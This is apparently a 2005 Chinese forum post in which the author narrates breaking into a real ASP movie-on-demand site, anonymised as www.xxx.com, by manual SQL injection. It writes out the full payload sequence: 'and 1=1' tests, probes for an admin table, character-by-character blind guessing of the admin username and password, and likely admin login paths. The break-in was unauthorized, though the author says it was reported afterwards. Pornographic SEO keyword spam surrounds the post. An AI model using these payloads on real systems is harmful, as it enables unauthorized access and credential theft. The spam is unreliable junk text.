国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

初次使用SQL破解某電影網站的記錄
2005-12-17   

首先下載:09月21日的SQL注入技術實例講解,打開后是網頁形式的,看過一次以后拿某網站VOD視頻做了一下測試。
首先引用一下教程里的話:“SQL injection可以說是一種漏洞,也可以說成是一種攻擊方法,程序中的變量處理不當,對用戶提交的數據過濾不足,都可能產生這個漏洞,而攻擊原理就是利用用戶提交或可修改的數據,把想要的SQL語句插入到系統實際SQL語句中,輕則獲得敏感的信息,重則控制服務器。SQL injection并不緊緊局限在Mssql數據庫中,Access、Mysql、Oracle、Sybase都可以進行SQL injection攻擊。 在大多數ASP站點中,我們并不知道其程序代碼,靠任何掃描器也不可能發現SQL injection漏洞,這時就要靠手工檢測了,由于我們執行SQL語句要用到單引號、分號、逗號、冒號和“--”,所以我們就在可修改的URL后加上以上符號,或在表單中的文本框加上這些符號 ”
尋找目標,我尋找到了,這里就用www.xxx.com代替吧。
打開一個電影地址,www.xxx.com/film/show.asp?id=271
測試一下www.xxx.com/film/show.asp?id=271 and 1=1
打開了??這步應該是測試可不可以用SQL注入攻擊的一個驗證吧,(不過我試的那個網站是可以SQL注入攻擊的,我到不知道不可以SQL注入攻擊會返回什么值)
www.xxx.com/film/show.asp?id=271and 1=2沒打開(在教程里面這個寫成了_blank>http://www.bofei.net/film/show.asp?id=271?adn 1=2 希望管理員如果看到的話請改一下~~)
www.xxx.com/film/show.asp?id=271 and 1=(select min(id) from admin)這一步是查看是否存在ADMIN列表的,測試以后打開,說明ADMIN列表存在
根據教程測試,測試密碼,www.xxx.com/film/show.asp?id=271 and 1=(select min(id) from admin where len(username)>5) 打不開,連接錯誤,后來跟教程一樣試了8,結果也是錯誤,后來直接圖方便把8改成了6,嘿嘿,還是錯誤,為啥?因為是>而不是=,后來試了幾次都沒有打開。郁悶了,想,是在哪出錯的?后來從新看了一次教程,并把命令粘到了文本文檔做比較,哦,原來應該是=,
www.xxx.com/film/show.asp?id=271 and 1=(select min(id) from admin where len(username)=6)
試了一下=以后,結果打開了,說明ADMIN的密碼=6位?繼續下一步。
猜測用戶名
www.xxx.com/film/show.asp?id=271 and 1=(select min(id) from admin where left(username,1)=''1'')
直接套這步,沒打開,后來苦思N久, 沒看懂教程里面的意思,哎,先放著,繼續下一步。
尋找站長的名字,當時還是沒大看懂這句,網站上N多地方都沒有網站站長的名字之類的,繼續下一步。
www.xxx.com/film/show.asp?id=271 and 1=(select min(id) from admin where left(username,6)=''13月32日'')
我試了次,當然打不開,2個站的站點ADMIN怎么能一樣內,嘿嘿。當時沒有理解這個的意思,我又繼續了下一步。我雖然不理解這句的意思,但是我稍微知道,13月32日,就是站長的ID,(username,6)就是站長的名字=6位長的意思。(不知道這樣理解對不對呀如果不對請指出)
猜測密碼,www.xxx.com/film/show.asp?id=271 and 1=(select min(id) from admin where left(password,6)=''100200'')
這步他直接猜測完了,他的密碼是6位數,然后密碼是100200,這步的步驟。
第1步應該猜測第1位數的密碼,
www.xxx.com/film/show.asp?id=271 and 1=(select min(id) from admin where left(password,1)=''1'')
''1''?應該把這個''''號里的1,從0-9,A-Z試一次,如果失敗,會打不開,直到成功了,就會正打開,而且沒有錯誤提示。這句我只能理解括號里面的,(password,1)=''1'')這句理解成: 密碼的第1位數=1
試完第1個密碼該試第2個密碼了,
www.xxx.com/film/show.asp?id=271 and 1=(select min(id) from admin where left(password,2)=''10'')
因為我已經站點第1個密碼是1了所以不用動第1位數了,這次也是從0-9,A-Z試一次,這步完了就該第3步了,
www.xxx.com/film/show.asp?id=271 and 1=(select min(id) from admin where left(password,3)=''100'')
依次第6步就應該是
www.xxx.com/film/show.asp?id=271 and 1=(select min(id) from admin where left(password,6)=''100200'')
因為先前已經知道他的密碼長度是6位了,然后他的管理員ID也依照這個方法來查
www.xxx.com/film/show.asp?id=271 and 1=(select min(id) from admin where left(username,1)=''1'')
(username,1)=''1'') 這句理解成:第1個名字的是:1
依次查出管理員名稱,
pass:如果管理員名字改成漢字,那半年也猜不錯吧?不知道能不能用漢字?:(
試出管理員密碼,然后試登陸頁面,3個地址
www.xxx.com/film/adminlogin.asp
www.xxx.com/film/login.asp
www.xxx.com/film/admin/login.asp
大概會應該有一個能進入的,然后用你剛才查到的管理員ID和PASSWORD進入。
好了,可以隨意瀏覽了,我進入了一下,沒什么好看的,我自己也有自己的站點,我要想看,自己下一個看算了,而且我和這個網站的管理員關系很好,如果我想看里面的電影,他會傳到開設到我帳戶的FTP里,然后我自己下載就可以看了,所以我已經把這個漏洞告訴他了,剩下的就是他們的辦法了,由于偶還是菜菜,偶不會清楚自己的PP,55,我也很誠實的告訴了他,而且我也沒動里面任何客戶的資料,沒添加任何一個客戶的時間卡,我想我這個善意的舉動,他們不會對我做什么懲罰吧?(第1次做這個事,不知道能不能算的上hacker的舉動,我沒用任何工具,全靠手慢慢猜的)如果他們懲罰我我可就完了,這個VOD視頻網站的上頭,就是我們當地的寬帶公司,我們這里只有電信和網通2家,電信是剛起家的接入的地方比較少,網通給我停網了,恐怕以后我就不能在家上網了,555。
這個方法,現在能成功的ASP電影網站恐怕很少了,因為我們這里相對網絡技術比較落后一些,他們的網絡安全觀念比較淡薄,所以這次還是會很順利的進入了他們的電影網站,我想如果他們進入數據庫里,類似做論壇一樣,隨便改幾個數據庫中的連接,就可以直接解決這個問題了,起碼你沒有他服務器的權限,你就不知道他的ADMIN管理進口在哪。
也希望各位高手說一下,就當幫小的一個忙,如果象我說的那種情況,有什么方法可以阻止別人象我這樣利用SQL攻擊而獲得ADMIN帳號?會的請跟貼說一下,謝謝了。(別叫人整個ASP都刪掉喲)??
希望各位高手大大都把自己第1次覺得自己做的成功的事,發上來,對于新手的學習,會起到很大的作用的。

熱詞搜索:

上一篇:動易4.03上傳漏洞
下一篇:SQL注入滲透某網絡安全公司的網站全過程

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
亚洲视频中文字幕| 免费久久精品视频| 日韩高清国产一区在线| 欧美日韩黄视频| 人人超碰91尤物精品国产| 欧美高清激情brazzers| 久久国内精品视频| 欧美国产精品久久| 欧美无人高清视频在线观看| 亚洲三级在线免费观看| 欧美性大战久久久久久久蜜臀| 亚洲成人自拍一区| 欧美成人精品3d动漫h| 国产一区二区成人久久免费影院 | 亚洲va国产va欧美va观看| 日韩欧美国产一区二区在线播放 | 精品一区二区三区不卡| 日本一区二区动态图| 欧美艳星brazzers| 国产毛片精品视频| 午夜伦理一区二区| 亚洲欧美综合另类在线卡通| 欧美精品久久99| 色综合一个色综合| 国产黄色精品视频| 天天色综合成人网| 亚洲欧美国产三级| 久久久久久久久久美女| 欧美日韩激情一区二区三区| 99久久免费视频.com| 蜜桃av噜噜一区| 亚洲一本大道在线| 国产精品国产三级国产aⅴ原创| 69p69国产精品| 在线欧美一区二区| 色综合久久久网| 岛国一区二区三区| 国产精品一区二区视频| 美女国产一区二区| 日精品一区二区三区| 亚洲最新视频在线观看| 中文字幕一区二区三| 国产农村妇女精品| 久久久国产精品午夜一区ai换脸| 9191成人精品久久| 欧美一区二区三区系列电影| 欧美日韩一区二区在线观看 | 精品久久久久香蕉网| 欧美精品tushy高清| 欧美在线观看视频在线| 色综合天天综合色综合av| 成人黄色电影在线| 国产suv一区二区三区88区| 国产一区二区三区蝌蚪| 国产综合一区二区| 久久99国产精品免费| 国产一区二区在线看| 国产永久精品大片wwwapp| 国产一区二区三区视频在线播放| 国产主播一区二区三区| 国产成人在线看| 99久久国产综合精品色伊| 91色视频在线| 欧美日本免费一区二区三区| 欧美一区二区视频观看视频 | 国产乱子伦一区二区三区国色天香| 麻豆国产一区二区| 国产精品影视网| 色综合久久综合网欧美综合网 | 欧美性受xxxx黑人xyx性爽| 91精品办公室少妇高潮对白| 欧美三级视频在线观看| 欧美一级视频精品观看| 久久精品一区二区三区四区| 国产精品久久久久久久午夜片| 亚洲视频免费在线| 同产精品九九九| 国产成人免费网站| 在线亚洲人成电影网站色www| 欧美日免费三级在线| 久久精品亚洲麻豆av一区二区| 国产精品福利一区二区三区| 亚洲成av人片| 国产91精品精华液一区二区三区| 在线观看日韩av先锋影音电影院| 日韩视频一区二区三区| 国产精品欧美极品| 日韩成人一级大片| 99这里只有久久精品视频| 欧美日精品一区视频| 国产婷婷色一区二区三区四区| 亚洲精品乱码久久久久久日本蜜臀| 日韩国产精品大片| 成人黄色av网站在线| 5月丁香婷婷综合| 亚洲欧洲精品一区二区三区不卡| 七七婷婷婷婷精品国产| 99久久综合色| 精品99一区二区三区| 亚洲黄色av一区| 成人爱爱电影网址| 精品国产乱子伦一区| 亚洲一区国产视频| 成人黄色a**站在线观看| 欧美不卡在线视频| 天天操天天综合网| 色综合激情五月| 国产精品美女视频| 狠狠色狠狠色合久久伊人| 欧美日韩国产大片| 自拍偷拍亚洲综合| 国产成人在线视频免费播放| 日韩一二三四区| 日韩精品电影在线| 精品视频一区 二区 三区| 亚洲视频一区在线| 99精品欧美一区二区三区综合在线| 欧美大片日本大片免费观看| 亚洲国产日韩a在线播放性色| 99久久精品一区二区| 国产日本一区二区| 国产原创一区二区| 久久久久国产一区二区三区四区| 日本va欧美va瓶| 欧美一级黄色片| 久久疯狂做爰流白浆xx| 日韩午夜在线观看| 美女精品自拍一二三四| 日韩午夜激情电影| 精品制服美女久久| 久久婷婷国产综合精品青草| 看电视剧不卡顿的网站| 26uuuu精品一区二区| 久久99精品国产麻豆婷婷| 26uuu久久综合| 成人性生交大片免费看视频在线| 久久精品一区八戒影视| av成人动漫在线观看| 亚洲激情图片qvod| 欧美精品免费视频| 久久精品国产亚洲高清剧情介绍 | 精品久久久久久久人人人人传媒| 精品一区二区在线播放| 国产午夜一区二区三区| 成人ar影院免费观看视频| 亚洲天堂精品在线观看| 欧美三级资源在线| 国产一区在线观看视频| 欧美国产1区2区| 欧美中文字幕一区二区三区亚洲| 亚洲高清免费观看高清完整版在线观看| 91精品国产美女浴室洗澡无遮挡| 久久国内精品自在自线400部| 日本一区二区三级电影在线观看 | 视频一区欧美精品| 2021国产精品久久精品| 不卡视频免费播放| 亚洲高清不卡在线| 国产清纯美女被跳蛋高潮一区二区久久w | 中文字幕在线一区| 欧美丝袜第三区| 国产一区二区h| 亚洲国产三级在线| 中文字幕免费不卡| 欧美一区二区三区免费观看视频| 国产成人亚洲综合a∨婷婷 | 欧美日韩国产在线观看| 成人综合在线观看| 天天综合天天综合色| 国产精品日日摸夜夜摸av| 欧美日韩一区中文字幕| 高清成人免费视频| 日本成人在线电影网| 亚洲日本青草视频在线怡红院| 欧美日韩久久久久久| 国产成人av电影| 奇米影视在线99精品| 亚洲蜜桃精久久久久久久| 精品久久久久久久一区二区蜜臀| 欧洲日韩一区二区三区| 丁香婷婷综合色啪| 久久99精品国产.久久久久久| 亚洲午夜电影网| 综合中文字幕亚洲| 国产精品三级av| 久久九九久久九九| 欧美成人video| 日韩三级视频在线观看| 欧美日韩精品欧美日韩精品一 | 天天影视色香欲综合网老头| 亚洲视频一区二区免费在线观看| 久久综合色天天久久综合图片| 欧美精品在欧美一区二区少妇| 97久久超碰精品国产| 成人激情午夜影院| 成人免费高清视频在线观看| 国产真实乱偷精品视频免| 免费高清在线视频一区·| 日韩不卡手机在线v区| 午夜av电影一区|